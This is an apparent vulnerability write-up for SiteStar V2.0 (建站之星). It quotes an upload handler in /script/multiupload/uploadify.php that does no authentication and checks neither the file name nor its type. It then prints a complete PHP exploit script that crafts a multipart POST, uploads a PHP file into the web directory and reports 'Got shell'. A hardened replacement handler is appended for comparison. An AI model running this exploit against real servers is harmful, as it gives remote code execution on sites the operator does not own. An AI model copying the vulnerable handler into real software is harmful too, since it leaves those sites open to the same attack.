SiteStar (建站之星) V2.0 file upload vulnerability
SiteStar V2.0 does not properly restrict file uploads. A remote attacker can use this to upload arbitrary files into the web directory and ultimately execute arbitrary commands on the server.
The vulnerability is in /script/multiupload/uploadify.php:
```php
<?php
if (!empty($_FILES)) {
    $tempFile   = $_FILES['Filedata']['tmp_name'];
    // Destination directory comes straight from the request
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
    // Destination file name is the client-supplied name, unchecked
    $targetFile = str_replace('//', '/', $targetPath) . $_FILES['Filedata']['name'];
    // Work around garbled Chinese file names on Windows
    if (preg_match('/^WIN/i', PHP_OS)) {
        $targetFile = iconv('UTF-8', 'GBK', $targetFile);
    }
    // No authentication, no extension or type check before the move
    move_uploaded_file($tempFile, $targetFile);
    echo "1";
}
```
Not much to say; this is a beginner's mistake. By crafting an HTML form you can upload a webshell directly into the web directory. A piece of test code is given below. EXP:
```php
<?php
print_r('
+---------------------------------------------------------+
 SiteStar V2.0 Remote Shell Upload Exploit
+---------------------------------------------------------+
');
if ($argc < 3)
{
    print "\nUsage: php $argv[0] host path\n";
    print "Example: php $argv[0] localhost /sitestar/\n";
    die();
}
error_reporting(0);
set_time_limit(0);
$host  = $argv[1];
$path  = $argv[2];
// URL of the uploaded file, used to verify the upload afterwards
$shell = 'http://' . $host . $path . 'cnryan.php';
// multipart/form-data body with boundary "cnryan"
$payload  = "--cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php phpinfo(); ?>W.S.T\r\n--cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n\r\n";
$payload .= "--cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n";
$payload .= "$path\r\n";
$payload .= "--cnryan--";
$packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=cnryan\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$packet .= $payload;
$fp = fsockopen($host, 80);
fputs($fp, $packet);
sleep(5);
// The marker W.S.T is echoed by the uploaded file if it was stored and executed
$str = file_get_contents($shell);
if (strpos($str, 'W.S.T'))
    exit("OK! Got shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
```
by cnryan
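For comparison, here is a hardened replacement for the same handler, added here as an example and not SiteStar's own code. It fixes the destination directory server-side instead of reading it from `$_POST['folder']`, checks the extension and the sniffed MIME type against an allow-list, generates the stored name itself, and confirms with `realpath()` that the final path stays under the upload root. `UPLOAD_ROOT`, `$allowedExt` and `storeUpload()` are names assumed for this example.

```php
<?php
// Added example, not SiteStar's code. Assumption: UPLOAD_ROOT is the only directory
// uploads may land in; it should be outside the web root or have PHP execution disabled.
define('UPLOAD_ROOT', __DIR__ . '/../../uploads');

// Allow-list of extensions and the MIME type each must sniff as (assumed for this example).
$allowedExt = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif', 'pdf' => 'application/pdf'];

// Authentication and CSRF checks for the caller belong before this function is reached.
function storeUpload(array $file, array $allowedExt): string
{
    // Only accept a real, error-free file uploaded with this request.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }
    // Decide the type from the file contents, not from the client-supplied name or MIME header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $ext   = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowedExt[$ext]) || $allowedExt[$ext] !== $mime) {
        throw new RuntimeException('disallowed file type');
    }
    // Server-generated name: no user-controlled path, no double extensions, never ".php".
    $storedName = bin2hex(random_bytes(16)) . '.' . $ext;
    $root = realpath(UPLOAD_ROOT);
    if ($root === false) {
        throw new RuntimeException('upload root missing');
    }
    $dest = $root . DIRECTORY_SEPARATOR . $storedName;
    // Belt and braces: the resolved destination directory must still be the upload root.
    if (realpath(dirname($dest)) !== $root) {
        throw new RuntimeException('path escapes upload root');
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644); // stored files are never executable
    return $storedName;
}

if (!empty($_FILES['Filedata'])) {
    try {
        echo json_encode(['ok' => true, 'name' => storeUpload($_FILES['Filedata'], $allowedExt)]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
    }
}
```

Against the exploit above, the request fails at the type check (a `.php` name is not in the allow-list) and, even if the list were wrong, the stored name and directory are no longer attacker-chosen, so the `W.S.T` marker is never reachable at a predictable URL.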